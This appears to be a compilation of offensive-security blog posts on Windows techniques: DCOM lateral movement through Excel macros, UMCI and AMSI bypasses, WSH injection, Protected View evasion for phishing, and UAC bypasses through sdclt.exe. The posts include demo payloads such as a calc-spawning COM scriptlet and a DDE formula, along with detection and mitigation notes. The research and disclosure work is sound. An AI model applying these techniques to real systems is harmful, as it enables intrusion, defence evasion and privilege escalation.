Lateral Movement using Excel.Application and DCOM

Back in January, I put out two blog posts on using DCOM for lateral movement; one using MMC20.Application and the other outlining two other DCOM applications that expose “ShellExecute” methods. While most techniques have one execution method (WMI has the Create() method, psexec creates a service with a custom binpath, etc.), DCOM allows you to use different objects that expose various methods. This allows an operator to pick and choose what they look like when they land on the remote host from a parent-child process relationship perspective.

In this post, I’m going to walk through abusing the Excel.Application DCOM application to execute arbitrary code on a remote host. This same DCOM application was recently talked about for lateral movement by using the RegisterXLL method, which you can read about here. In this post, I’m going to focus on the “Run()” method. In short, this method allows you to execute a named macro in a specified Excel document. You can probably see where I’m going with this 🙂

As you all may know, VBA macros have long been a favorite technique for attackers. Normally, VBA abuse involves a phishing email with an Office document containing a macro, along with enticing text to trick the user into enabling that malicious macro. The difference here is that we are using macros for pivoting and not initial access. Due to this, Office Macro security settings are not something we need to worry about. Our malicious macro will execute regardless.

At this point, we know that Excel.Application is exposed via DCOM. By using OLEViewDotNet by James Forshaw (@tiraniddo), we can see that there are no explicit launch or access permissions set:

If a DCOM application has no explicit Launch or Access permissions, Windows allows users of the Local Administrator group to Launch and Access the application remotely. This is because DCOM applications have a “Default” set of Launch and Access permissions. If no explicit permissions are assigned, the Default set is used. This can be found in dcomcnfg.exe and will look like this:

Since Local Administrators are able to remotely interface with Excel.Application, we can then remotely instantiate it via PowerShell using [Activator]::CreateInstance():

As you can see, remote instantiation succeeded. We now have the ability to interact with Excel remotely. Next, we need to move our payload over to the remote host. This will be an Excel document that contains our malicious macro. Since VBA allows Win32 API access, the possibilities are endless for various shellcode runners. For this example, we will just use shellcode that starts calc.exe. If you are curious, you can find an example here.

Just create a new macro, name it whatever you want, add in your code and then save it. In this instance, my macro name is “MyMacro” and I am saving the file in the .xls format.

With the actual payload created, the next step is to copy that file over to the target host. Since we are using this technique for Lateral Movement, we need Local Admin rights on the target host. Since we have that, we can just copy the file over:

With the payload on target, we just need to execute it. This can be done using the Run() method of the Excel.Application DCOM application that was instantiated earlier. Before we can actually call that method, the application needs to know what Excel file the macro resides in. This can be accomplished using the “Workbooks.Open()” method. This method just takes the local path of the file. So, what happens if we invoke the method and pass the location of the file we just copied?

Well, isn’t that interesting. The file exists, but Excel.Application is stating that it doesn’t. Why might this be? When Excel.Application is instantiated via DCOM, it is actually instantiated via the Local System identity. The Local System user, by default, does not have a profile. Since Excel assumes that it is in an interactive user session, it fails in a less than graceful way. How can we fix this? There are better ways to do this, but a quick solution is to remotely create the Local System profile.

The path for this profile will be: C:\Windows\System32\config\systemprofile\Desktop and C:\Windows\SysWOW64\config\systemprofile\Desktop.

Now that the Local System profile is created, we need to re-instantiate the Excel.Application object and then call “Workbooks.Open()” again:

As you can see, we were now able to open the workbook containing our malicious macro. At this point, all we need to do is call the “Run()” method and pass it the name of our malicious macro. If you remember from above, I named mine “MyMacro”

Calling “Run(myMacro)” will cause the VBA in that macro to execute. To verify this, we can open Process Explorer on the remote host and verify. As you can see below, this particular host has the “Disable VBA for Office Applications” GPO set. Regardless of that security setting, the macro is permitted to execute:

For this example, I just used calc spawning shellcode, which resulted in a child process being spawned under Excel.exe. Keep in mind that since VBA offers a lot in terms of interaction with the OS, it is possible to not spawn a child process and just inject into another process instead. The final steps would be to remotely cleanup the Excel object and delete the payload off the target host.

I have automated this technique via PowerShell, which you can find here: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b

To assist in mitigating this vector, you could manually apply remote Launch and Access permissions to the Excel.Application object…but don’t forget to look at all the other Office applications. Another option would be to change the default remote Launch/Access DACLs via dcomcnfg.exe. Keep in mind that any DACL changes should be tested as such modifications could potentially impact legitimate usage.  In addition to that, enabling the Windows Firewall and reducing the number of Local Administrators on a host are also valid mitigation steps.

What stands out the most with this technique is that Excel and the child process will spawn as the invoking user. This will often be process creations from user accounts that different than the user that is currently logged on. If those are the only two processes and the user account being used doesn’t normally logon to that host, that might be a red flag.

-Matt N.

UMCI vs Internet Explorer: Exploring CVE-2017-8625

In the recent months, I have spent some time digging into Device Guard and how User Mode Code Integrity (UMCI) is implemented. If you aren’t familiar with Device Guard, you can read more about it here. Normally, UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and places PowerShell in Constrained Language mode. This makes obtaining code execution on a system fairly challenging. This post is going to highlight bypassing User Mode Code Integrity to instantiate objects that are normally blocked.

This bug was fixed in the August 2017 Patch Tuesday release under CVE-2017-8625. The patch fixed two different techniques as both of them abuse the fact that MSHTML isn’t enlightened. The other technique abused Microsoft Compiled HTML Help files (CHMs). This was blogged about by @Oddvarmoe and you can read more about that here: https://msitpros.com/?p=3909

As I mentioned above, the root cause of the bug was that MSHTML wasn’t enlightened in the context of UMCI. This essentially means that Device Guard’s UMCI component didn’t restrict MSHTML and simply let it execute everything with assumed “Full Trust.” Due to this, Internet Explorer permitted loading restricted objects. How, you might ask? The answer lies with Internet Explorer’s ability to interface with ActiveX and COM components =)

For example, the below HTML file will use a script tag to run some JScript. UMCI normally blocks instantiation of this object (and just about every other one). As a PoC, I just instantiated WScript.Shell and invoked the “Run” method to demonstrate I could instantiate a blocked object and invoke one of its methods.

As you can see below, “WScript.Shell” was blocked from instantiating via UMCI. Immediately following that, we instantiate “WScript.Shell” again via the HTML file and then start “calc.exe” via the “Run” method:

Since MSHTML didn’t conform to the same restrictions as other OS components, the WScript.Shell object was permitted to load and the run method was freely accessible.

It should be noted that Internet Explorer does apply zone security to prevent automatic execution of ActiveX controls via HTML. When opened, the user will see two prompts, one from IE asking permission to enable the ActiveX content and another security warning alerting the user that the content might be malicious. If an attacker is on a system but doesn’t have unsigned code execution (see WMImplant), all it takes is two User Hive registry changes to temporarily disable the ActiveX alerting, allowing for silent unsigned code-execution. Those two changes look like this:

Most UMCI bypasses are serviceable bugs per Microsoft, so be sure to send those over to secure@microsoft.com if you like CVEs =)

With CVE-2017-8625 issued, ActiveX/COM controls are no longer able to be loaded as Internet Explorer is now enlightened. This hopefully makes MSHTML bypasses a bit harder to find =)

Disclosure timeline:

12/13/2016: Report submitted to secure@microsoft.com
03/2017: Fix was pushed into RS1 (Creators Update)
08/08/2017: RS1 fix was back ported; CVE-2017-8625 issued

-Matt N.

WSH Injection: A Case Study

At BSides Nashville 2017, Casey Smith (@SubTee) and I gave a talk titled Windows Operating System Archaeology. At this talk, we released a handful of offensive techniques that utilized the Component Object Model (COM) in Windows. One such technique described was abusing attacker controlled input passed to calls to GetObject(), which I will be discussing here.

Some environments use whitelisting to prevent unsigned Windows Scripting Host (WSH) files from running, especially with the rise of malicious .js or .vbs files. However, by “injecting” our malicious code into a Microsoft signed WSH script, we can bypass such a restriction.

Before diving into the different scripts that can be used for injection, it’s important to understand some of the mechanics behind why this works. When abusing injection, we are taking advantage of attacker controlled input passed to GetObject() and then combining that with the “script:” or “scriptlet:” COM monikers.

GetObject()

This method allows you to access an already instantiated COM object. If there isn’t an instance of the object already (if invoked without a moniker), this call will fail. For example, accessing Microsoft Excel’s COM object via GetObject() would look like this:

Set obj = GetObject( , "Excel.Application")

For the above to work, an instance of Excel has to be running. You can read more about GetObject() here

COM Monikers

While GetObject() is interesting by itself, it only allows us to access an instance of an already instantiated COM object. To get around this, we can implement a COM moniker to facilitate our payload execution. If you aren’t familiar with COM monikers, you can read more about them here. There are various COM monikers on Windows that allow you to instantiate objects in various ways. From an offensive standpoint, you can use these monikers to execute malicious code. That is a topic for another blog post :-).

For this post, we will focus on the “script:” and “scriptlet:” monikers. These particular monikers interface with scrobj.dll and help facilitate execution of COM scriptlets, which will be the payload. This was discovered by Casey Smith (@SubTee) and discussed at DerbyCon 2016 as well as blogged about here.

An example COM scriptlet will look like this:

<?XML version="1.0"?>
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</scriptlet>

You can also use James Forshaw’s (@tiraniddo) tool DotNetToJScript to extend the JScript/VBScript in the COM Scriptlet, allowing for Win32 API access and even Shellcode execution. When you combine one of these two monikers and various calls to GetObject(), a lot of fun is had.

Now that the very brief COM background is over, time to look at an example 🙂

PubPrn.vbs

On Windows 7+, there is a Microsoft Signed WSH script called “PubPrn.vbs,” which resides in “C:\Windows\System32\Printing_Admin_Scripts\en-US”. When looking at this particular script, it becomes apparent that it is taking input provided by the user (via command line arguments) and passing an argument to “GetObject()”.

This means that we can run this script and pass it the two arguments it expects. The first argument can be anything and the second argument is the payload via the script: moniker.

Note: If you provide a value that isn’t a network address for the first argument (since it expects a ServerName), you can add the “/b” switch to cscript.exe when calling to suppress any additional error messages.

Since VBScript relies on COM to perform actions, it is used heavily in numerous Microsoft signed scripts. While this is just one example, there are bound to be others that can be exploited in a similar fashion. I encourage you to go hunting 🙂

  • Matt N.

Bypassing AMSI via COM Server Hijacking

Microsoft’s Antimalware Scan Interface (AMSI) was introduced in Windows 10 as a standard interface that provides the ability for AV engines to apply signatures to buffers both in memory and on disk. This gives AV products the ability to “hook” right before script interpretation, meaning that any obfuscation or encryption has gone through their respective deobfuscation and decryption routines. If desired, you can read more on AMSI here and here. This post will highlight a way to bypass AMSI by hijacking the AMSI COM server, analyze how Microsoft fixed it in build #16232 and then how to bypass that fix.

This issue was reported to Microsoft on May 3rd, and has been fixed as a Defense in Depth patch in build #16232.

To get started, this is what an AMSI test sample through PowerShell will look like when AMSI takes the exposed scriptblock and passes it to Defender to be analyzed:

As you can see, AMSI took the code and passed it along to be inspected before Invoke-Expression was called on it. Since the code was deemed malicious, it was prevented from executing.

That begs the question: how does this work? Looking at the exports of amsi.dll, you can see the various function calls that AMSI exports:

One thing that stood out to me immediately is amsi!DllGetClassObject and amsi!DllRegisterServer, as these are all COM entry points and used to facilitate instantiation of a COM object. Fortunately, COM servers are easy to hijack since medium integrity processes default to searching the current user registry hive (HKCU) for the COM server before looking in HKCR/HKLM.

Looking in IDA, we can see the COM Interface ID (IID) and ClassID (CLSID) being passed to CoCreateInstance():

We can verify this by looking at ProcMon:

What ends up happening is that AMSI’s scanning functionality appears to be implemented via its own COM server, which is exposed when the COM server is instantiated. When AMSI gets loaded up, it instantiates its COM component, which exposes methods such as amsi!AmsiOpenSession, amsi!AmsiScanBuffer, amsi!AmsiScanString and amsi!AmsiCloseSession. If we can force the COM instantiation to fail, AMSI will not have access to the methods it needs to scan malicious content.

Since the COM server is resolved via the HKCU hive first, a normal user can hijack the InProcServer32 key and register a non-existent DLL (or a malicious one if you like code execution). In order to do this, there are two registry entries that need to be made:

When AMSI attempts to instantiate its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless.

As you can see, importing the above registry change causes “C:\IDontExist” to be returned as the COM server:

Now, when we try to run our “malicious” AMSI test sample, you will notice that it is allowed to execute because AMSI is unable to access any of the scanning methods via its COM interface:

You can find the registry changes here:

https://gist.github.com/enigma0x3/00990303951942775ebb834d5502f1a6

Now that the bug is understood, we can go about looking at how Microsoft fixed it in build #16232. Since amsi.dll is AMSI’s COM server as well, diffing the two DLLs seemed like a good place to start. Looking at the diff, the AmsiInitialize function stood out as it likely contains logic to actually instantiate AMSI.

On the left, we have the old AMSI DLL and on the right, we have the newly updated AMSI DLL. As you can see, Microsoft appears to have removed the call to CoCreateInstance() and replaced it with a direct call to DllGetClassObject(). CoCreateInstance() can be defined as a high-level function used to instantiate COM objects that is implemented using CoGetClassObject(). After resolution finishes (partially via registry CLSID lookups) and the COM server is located, the server’s exported function “DllGetClassObject()” is called. By replacing CoCreateInstance with a direct call to amsi.dll’s DllGetClassObject() function, the registry resolution is avoided. Since AMSI is no longer querying the CLSID in the registry for the COM server, we are no longer able to hijack it.

Now that we know the fix, how do we go about bypassing it? Before proceeding, it is important to understand that this particular bug has been publicized and talked about since 2016. Essentially, scripting interpreters, such as PowerShell, load amsi.dll from the working directory instead of loading it from a safe path such as System32. Due to this, we can copy PowerShell.exe to a directory we can write to and bring back the vulnerable version of amsi.dll. At this point, we can either hijack the DLL off the bat, or we can create our same registry keys to hijack AMSI’s COM component. Since this vulnerable AMSI version still calls CoCreateInstance(), we can hijack the registry search order again.

First, we can verify that the patched amsi.dll version doesn’t query the COM server via the registry by creating a ProcMon filter for powershell.exe and AMSI’s CLSID. When PowerShell starts, you will notice no entries come up:

Next, we drop the vulnerable AMSI DLL and move PowerShell to the same directory. As you can see, it is now querying the registry to locate AMSI’s COM server:

With the vulnerable AMSI DLL back, we can now execute the COM server hijack:

Detection: Despite fixing this in build# 16232, it is still possible to execute this by executing a DLL hijack using the old, vulnerable AMSI DLL. For detection, it would be ideal to monitor (via command line logging, etc.) for any binaries (wscript, cscript, PowerShell) that are executed outside of their normal directories. Since the bypass to the fix requires moving the binary to a user writeable location, alerting on these executing in non-standard locations would catch this.

-Matt N.

Phishing Against Protected View

Microsoft Office has a security feature called Protected View. This feature opens an Office document that originates from the internet in a restricted manner. The idea is that it will prevent automatic exploitation of things such as OLE, Flash and ActiveX by restricting Office components that are allowed to execute. In 2016, Microsoft Patched a bug in Protected View around Excel Add-in files via CVE-2016-4117. @HaifeiLi has done some great research in this area, which you can read about here. MWR Labs also has a great white paper on understanding the Protected View Sandbox, which you can read about here. In this post, I will highlight some techniques you can employ to circumvent Protected View while still having access to the techniques us red teamers have grown to know and love. 

In my experience, end users are less likely to exit Protected View than they are to click through an Office dialogue box. I believe the reason for this is that they can access the document’s content while in Protected View, which is all they really need. When phishing, reducing the number of clicks for a user is always helpful. Protected View presents one additional click; if we can get rid of it, the better off we will be.

Full Disclosure: These were reported to MSRC on April 20th, 2017 and all of these have been deemed not a security issue. Features, not bugs 😉

Before I get into these techniques, it’s important to understand the normal behavior. Attackers often use a number of tricks to get code-execution on a target system. This often ranges from Office macros, to OLE objects and Excel formula injection via DDE. If we embed a LNK into an Excel document via OLE, we will see this locally:

 

Now, if we host the above document, Protected View will activate and the embedded OLE object will not be able to activate via a double-click until Protected View is exited:

This is what should happen when a document comes in from the internet; things such as OLE, ActiveX and DDE should be blocked until “Enable Editing” is clicked.

Now that we know what normal Protected View behavior looks like, we can dive into some ways around it. The first one I want to cover is executing a file via OLE from a Publisher file. Like Word and Excel, Microsoft Publisher often comes with Microsoft Office and includes similar functionality, such as OLE embedding. Attackers often use LNK files embedded via OLE, so we will do the same in this example. Publisher offers many features to make the OLE object enticing to the user. For simplicity, I will not go into these features.

For this example, we will use a LNK payload that simply executes: “C:\Windows\System32\cmd.exe /c calc.exe”. I won’t go into embedding OLE inside Publisher either as it’s nearly identical to the other Office formats. If we host the Publisher file with the OLE embedded LNK, you will notice that Protected View does not activate. Clicking on the OLE object displays 1 prompt to the user:

Clicking “Open” will cause the LNK to execute:

As you can see, double clicking the OLE object resulted in the LNK being executed (after a “Open File” prompt). Normally, Protected View would have prevented the OLE object from being activated until the user explicitly exited it.

Next, we will go into OneNote. OneNote allows for attaching files to note files. LNK files look a bit weird when attached to OneNote, so we will use a VBScript instead. For this example, this VBScript file will simply execute calc.exe via the Run method of the WScript.Shell COM object. For simplicity, I won’t go into dressing the document up to entice the user.

If we host the OneNote file (.ONE) with the attached VBScript file, you will notice that Protected View does not activate. The user is presented with 1 dialogue:

Clicking “OK” will result in the VBScript being executed:

 

So far, we have Publisher files and OneNote files that don’t trigger Protected View, but allow for OLE embedding, or something similar. Finally, there are Excel Symbolic Link files. This file format somewhat restricts the content it can host. In my testing, SLK files will strip OLE objects and any existing macro when saved. Fortunately, there are still attacks like Excel Formula Injection via DDE. If you don’t know about this technique, you can read more about it here.

Normally, Protected View will prevent automatic cell updating, which renders this attack useless while in Protected View. If we add a malicious formula and save it as a Symbolic Link (.SLK) file, we can get around the Protected View portion of the attack.

In this example, the Excel formula will be something like this:

=cmd|‘ /C calc’!A0

It is important to note that the DDE injection attack does present the user with 2 security warnings. There may be additional functionality in Excel SLK outside of DDE that won’t prompt 2 security dialogues…I encourage you to use your imagination 🙂

If we save the file as a normal Excel file, you will notice that Protected View blocks the automatic “Enable” prompt, and requires the user to exit Protected View first:

Now, if we save the file as .SLK and host it, you will notice that Protected View is not activated, and the user is automatically presented with the “Enable, Disable” prompt. 

Clicking “Enable” will present the user with the following dialogue. I’ll be the first to say that users love to click “Yes” on this prompt 😉

Clicking “Yes” will result in the command being executed:

While the user is presented with 2 prompts for the .SLK attack, users are often less likely to exit Protected View then click on the displayed prompts. From a Red Team perspective, any way to get around Protected View is worth the investment in terms of payload delivery.

Prevention: I am not currently aware of a way to manually enroll Publisher, OneNote and .SLK files into Protected View. User awareness training is recommended. If your end users do not use OneNote and Publisher, one solution would be to uninstall these.

  • Matt N.

Defeating Device Guard: A look into CVE-2017-0007

Over the past few months, I have had the pleasure to work side-by-side with Matt Graeber (@mattifestation) and Casey Smith (@subtee) in their previous job roles, researching Device Guard user mode code integrity (UMCI) bypasses. If you aren’t familiar with Device Guard, you can read more about it here: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/device-guard-deployment-guide.  In short, Device Guard UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and it places PowerShell in Constrained Language mode, unless the scripts themselves are signed by a trusted signer. After spending some time evaluating how scripts are handled on Device Guard enabled systems, I ended up identifying a way to get any unapproved script to execute on a Device Guard enabled system. Upon reporting the issue to MSRC, this bug was eventually assigned CVE-2017-0007 (under MS17-012) and patched. This particular bug only impacts PowerShell and the Windows Scripting Host, and not compiled code.

This bug is my first CVE and my first time reversing a patch. This post is a write-up of not only the bug, but the patch reverse-engineering process that I took as well. Since this is my first time doing this, there are bound to be errors. If I stated something incorrectly, please let me know so I can learn 🙂

When executing a signed script, wintrust.dll handles validating the signature of that file. This was determined after looking at the exports. Ideally, if you take a Microsoft signed script and modify it, the integrity of the file has been compromised, and the signature should no longer be valid. Such validation is critical and fundamental to Device Guard, where its sole purpose is to prevent unsigned or untrusted code from running. CVE-2017-0007 circumvents this protection, allowing you to run any unsigned code you want by simply modifying a script that was previously signed by an approved signer. In this case, a Microsoft signed script was chosen since code signed by Microsoft needs to be able to run on Device Guard. For example, if we try to run an unsigned PowerShell script that executes restricted actions (e.g. instantiation of most COM objects), it will fail due to PowerShell being in Constrained Language mode. Any signed and trusted PowerShell code that is approved via the deployed Code Integrity Policy is permitted to run in “FullLanguage” mode, allowing it to execute with no restrictions. In this case, our code is not signed nor trusted, so it is placed in Constrained Language mode and fails to execute correctly.

Fortunately, Microsoft has scripts that are signed with their code signing certificate. You can validate that a script is indeed signed by Microsoft using sigcheck or the PowerShell cmdlet “Get-AuthenticodeSignature”. In this case, I grabbed a signed PowerShell script from the Windows SDK and renamed it to “MicrosoftSigned.ps1”:

When scripts like these are signed, they often contain an embedded authenticode signature within the body of the script. If you were to modify any contents of that file, the integrity of said file would be broken and the signature would no longer be valid. You can also simply copy the authenticode signature block from a signed file and paste it into the body of an unsigned script:

As you can see, the original contents of the script were replaced with our own code, and sigcheck reports that “The digital signature of the object did not verify”, meaning the integrity of the file has been compromised and the code will be blocked from running, right?

As you can see, our code executed anyway, despite the invalidated digital signature. Microsoft assigned this bug CVE-2017-0007, classified under MS17-012. The underlying issue here is that the error code returned by the function that ensures the file’s integrity never gets validated, resulting in successful execution of the unsigned code.

So, what is the reason for the bug, and how was it fixed? Device Guard relies on wintrust.dll to handle some of the signature and integrity checks on signed files. Due to the nature of the bug, this was the first place I looked. Bindiffing wintrust.dll pre-patch (10.0.14393.0) and post-patch (10.0.14393.953) reveals a new chunk of code was added. While there was one other change to wintrust.dll, this was the only change that pertained to validating signed scripts. Due to this, is very likely to be the patch for the bug:

Looking closer, you will see that some code from “sub_18002D0F8” was removed:

Looking at the newly added block named “sub_18002D104”, you will see that it contains some code from “sub_18002D0F8” as well as some additions. These particular functions don’t have symbols, so we must refer to them as the defined names. Alternatively, you can also rename these functions in IDA to something more meaningful.

The text above is a bit small, but I will go into depth on what exactly was done. I won’t go into specifics on using bindiff, but if you want to learn more I recommend you check out the manual. Armed with the general location of the bug fix, I set out to identify exactly what was happening when our unsigned code was executed. Knowing that some code was removed from “sub_18002D0F8” and added to a new block named “sub_18002D104” made these two places a good starting point. First, I opened up the pre-patch version of wintrust.dll (10.0.14393.0) in IDA, and navigated to the sub that was modified in the patch (sub_18002D0F8). This function starts off by setting a few variables and then calls “SoftpubAuthenticode”

Looking at “SoftpubAuthenticode” reveals that it calls another function named “CheckValidSignature”:

It makes sense that “CheckValidSignature” would handle validating the signature/integrity of the file being executed. Looking at this function, we can get the location of the last instruction before it returns.

We can see the error code from “CheckValidSignature” in the eax register by setting a windbg breakpoint at the last instruction in the function, which is highlighted in yellow above.

In this case, the error code is “0x80096010”, which translates to “TRUST_E_BAD_DIGEST”, according to wintrust.h in the Windows SDK. This is why we see “The digital signature of the object did not verify.” when running sigcheck on a modified signed file. After “CheckValidSignature” returns (via retn), we arrive back at “SoftpubAuthenticode”.

“SoftPubAuthenticode” then goes on to call “SoftpubCallUI” and then returns back to “sub_18002D0F8”, all while keeping our error code “0x80096010” in the eax register. Now that we know what the error code is and where it is stored, we can take a close look at why our script was actually allowed to run, despite “CheckValidSignature” returning “TRUST_E_BAD_DIGEST”. At this point, we are resuming execution in sub_18002D0F8, immediately after the call to “SoftpubAuthenticode”.

Since our error code is stored in eax, it gets overwritten immediately after returning from SoftpubAuthenticode via “move rax, [r12]”.

Since the error code stating that our script’s digital signature isn’t valid doesn’t exist anymore, it never gets validated and the script is allowed to execute:

With an understanding of exactly what the bug is, we can go look at how Microsoft patched it. In order to do so, we need to install KB4013429. Looking at the new version of wintrust.dll (10.0.14393.953), we can explore “sub_18002D104”, which is the added block of code that was identified towards the beginning of the blog post. We know that the bug stemmed from the register holding our error code was being overwritten and not validated. We can see that the patch added a new call to “sub_18002D4BC” following the return from “SoftPubAuthenticode”.

You may also notice in the picture above that our error code gets placed in the ecx register, and the instructions to overwrite the rcx register is now dependent on a test instruction, followed by a “jump if zero” instruction. This means that our error code, now stored in “ecx” will only get overwritten if the jump isn’t followed. Looking at the newly introduced sub “sub_18002D4BC”, you will see this:

This function returns a BOOL (0 or 1), depending on the result of operations performed on our error code. This addition checks to see if the call to “SoftpubAuthenticode” succeeded (< 0x7FFFFFFF) or if the return code matches “0x800B0109”, which translates to “CERT_E_UNTRUSTEDROOT”. In this case, SoftpubAuthenticode returned 0x80096010 (TRUST_E_BAD_DIGEST) which does not match either of the described conditions, resulting in the function returning 1 (TRUE).

After setting “al” to “1” and returning back to the previous function, we can see how this bug was actually patched:

With “al” set to “1”, the function does another logical compare to see if “al” is zero or not. Since it isn’t, it sets the “r14b” register to “0” (since the ZF flag isn’t set from the previous “test” instruction). It then does a last logical compare to check if “r14b” is zero. Since it is, it follows the jump and skips over the portion of code that overwrites the “rcx” register (leaving ecx populated with our error code). The error code eventually gets validated and the script is placed in Constrained Language mode, causing failed execution.

Cheers,
Matt

“Fileless” UAC Bypass using sdclt.exe

Recently, I published a post on using App Paths with sdclt.exe to bypass UAC. You may remember that the App Path bypass required a file on disk. Since sdclt.exe is out there, I figured I would publish another bypass using that binary, only this one is fileless. I mentioned it in my previous post, but the Vault7 leak confirms that bypassing UAC is operationally interesting, even to nation states, as several UAC bypasses/notes were detailed in the dump. As far as public bypasses go, definitely check out the UACME project by @hfiref0x, which has a nice collection of public techniques.

In newer versions of Windows, Microsoft has shown that they are taking the bypasses seriously. This has motivated me to spend a little more time on UAC and the different methods around it.

As some of you may know, there are some Microsoft signed binaries that auto-elevate due to their manifest. You can read more about these binaries and their manifests here. While searching for more of these auto-elevating binaries by using the SysInternals tool “sigcheck“, I came across “sdclt.exe” and verified that it auto-elevates due to its manifest:

*Note: This only works on Windows 10. The manifest for sdclt.exe in Windows 7 has the requestedExecutionLevel set to “AsInvoker”, preventing auto-elevation when started from medium integrity.

As I mentioned in my last post, a common technique used to investigate loading behavior on Windows is to use SysInternals Process Monitor to analyze how a process behaves when executed. I often work some basic binary analysis into my investigative process in order to see what other opportunities exist.

One of the first things I tend to do when analyzing an auto-elevate binary is to look for any potential command line arguments. I use IDA for this, but you can use your preferred tool. When peering into sdclt.exe, I noticed a few arguments that stood out due to interesting keywords:

These were interesting as sdclt.exe is set to auto-elevate in its manifest anyway. Looking at sdclt.exe in IDA, it checks if the argument matches “/kickoffelev”. If it does, it sets the full path for “sdclt.exe”, adds “/KickOffJob” as a parameter and then calls SxShellExecuteWithElevate.

Following that path, SxShellExecuteWithElevate starts “%systemroot%\system32\sdclt.exe /kickoffjob” with the “Runas” verb. This is essentially programmatically executing the “RunAsAdministrator” option when you right-click a binary.

The next step is to run “sdclt.exe /Kickoffelev” with procmon running. After going through the output, we see the trusty “shell\<verb>\command” registry search path in the HKEY_CURRENT_USER hive.

The next step was to add those keys and see if our binary and parameters of choice would execute. Unfortunately, nothing executed after adding the keys and starting “sdclt.exe /kickoffelev”. Looking back in procmon, our keys are queried, but sdclt.exe is actually looking for an additional value within the “command” key: “IsolatedCommand”.

We can then add our payload and parameters in a string (REG_SZ) value within the “Command” key called “IsolatedCommand”:

This is the same bug (minus the IsolatedCommand portion) that was used in the eventvwr.exe “fileless” UAC bypass. You can read about the eventvwr.exe bypass and the specific registry keys used here. Notice that instead of “shell\open\command”, we now see “shell\runas\command”. This is because sdclt.exe was invoked (again) using the “RunAs” verb via SxShellExecuteWithElevate.

After adding our payload as the “IsolatedCommand” value, running “sdclt.exe /KickOffElev” will execute our payload (and any parameters) in a high-integrity context:

To demonstrate this technique, you can find a script here: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1

The script takes a full path to your payload and any parameters. “C:\Windows\System32\cmd.exe /c notepad.exe” is a good one to validate. It will automatically add the keys, start “sdclt.exe /kickoffelev” and then cleanup.

This particular technique can be remediated or fixed by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group. Further, if you would like to monitor for this attack, you could utilize methods/signatures to look for and alert on new registry entries in HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand

Cheers,
Matt

Bypassing UAC using App Paths

Over the past several months, I’ve taken an interest in Microsoft’s User Account Control (UAC) feature in Windows. While Microsoft doesn’t define UAC as a security boundary, bypassing this protection is still something attackers frequently need to do. The recent Vault7 leak confirms that bypassing UAC is operationally interesting, even to nation states, as several UAC bypasses/notes were detailed in the dump. On the purposefully public side, check out the UACME project by @hfiref0x for a great collection of existing techniques.

Microsoft seems to have a renewed interest in UAC, finally fixing many of the issues highlighted by publicly disclosed bypasses. While these fixes are only in newer versions of Windows, the active response from Microsoft drives me to continue searching for UAC bypasses. I’ve previously blogged about two different bypass techniques, and this post will highlight an alternative method that also doesn’t rely on the IFileOperation/DLL hijacking approach. This technique works on Windows 10 build 15031, where the vast majority of public bypasses have been patched.

As some of you may know, there are some Microsoft signed binaries that auto-elevate due to their manifest. You can read more about these binaries and their manifests here. While searching for more of these auto-elevating binaries by using the SysInternals tool “sigcheck“, I came across “sdclt.exe” and verified that it auto-elevates due to its manifest:

*Note: This only works on Windows 10. The manifest for sdclt.exe in Windows 7 has the requestedExecutionLevel set to “AsInvoker”, preventing auto-elevation when started from medium integrity.

When observing the execution flow of sdclt.exe, it becomes apparent that this binary starts control.exe in order to open up a Control Panel item in high-integrity context:

I became curious how sdclt.exe obtains the path to control.exe. Looking again at the execution flow, sdclt.exe queries the App Path key for control.exe within the HKEY_CURRENT_USER hive.

Calls to HKEY_CURRENT_USER (or HKCU) from a high integrity process are particularly interesting. This often means that an elevated process is interacting with a registry location that a medium integrity process can tamper with. In this case, I saw that “sdclt.exe” was querying HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe. If you aren’t familiar with App Paths in Windows, you can read more about the topic here.

As it stands, sdclt.exe looks for the App Path of control.exe in the HKCU hive. Essentially, this binary is asking “what is the full path of control.exe?”. If that key isn’t found, it continues the typical Windows search order. Since it is searching in a place that can be modified, we can populate the key.

Guess what happens once sdclt.exe is started again? You guessed it. Sdclt.exe queried our newly created App Paths key for control.exe, resulting in cmd.exe getting returned.

Looking at Process Explorer (or whoami /groups), I was able to confirm that cmd.exe is indeed high integrity:

It is important to note that this technique does not allow for parameters, meaning it requires your payload to be placed on disk someplace. If you try to give the binary any parameters (e.g, C:\Windows\System32\cmd.exe /c calc.exe), it will interpret the entire string as the lpFile value to the ShellExecuteInfo structure, which is then passed over to ShellExecuteEx. Since that value doesn’t exist, it will not execute.

To demonstrate this technique, you can find a script here: https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1

The script takes a full path to your payload. C:\Windows\System32\cmd.exe is a good one to validate. It will automatically add the keys, start sdclt.exe and then cleanup.

This particular technique can be remediated or fixed by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group. Further, if you would like to monitor for this attack, you could utilize methods/signatures to look for and alert on new registry entries in HKCU\Microsoft\Windows\CurrentVersion\App Paths\Control.exe.

Cheers,
Matt

Lateral Movement via DCOM: Round 2

Most of you are probably aware that there are only so many ways to pivot, or conduct lateral movement to a Windows system. Some of those techniques include psexec, WMI, at, Scheduled Tasks, and WinRM (if enabled). Since there are only a handful of techniques, more mature defenders are likely able to prepare for and detect attackers using them. Due to this, I set out to find an alternate way of pivoting to a remote system.

This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access:

empty_launch_permissions

You can read more on that thread here. This got me thinking about other objects that have no explicit LaunchPermission set. Viewing these permissions can be achieved using @tiraniddo’s OleView .NET, which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: “ShellBrowserWindow” and “ShellWindows”:

interesting_objects

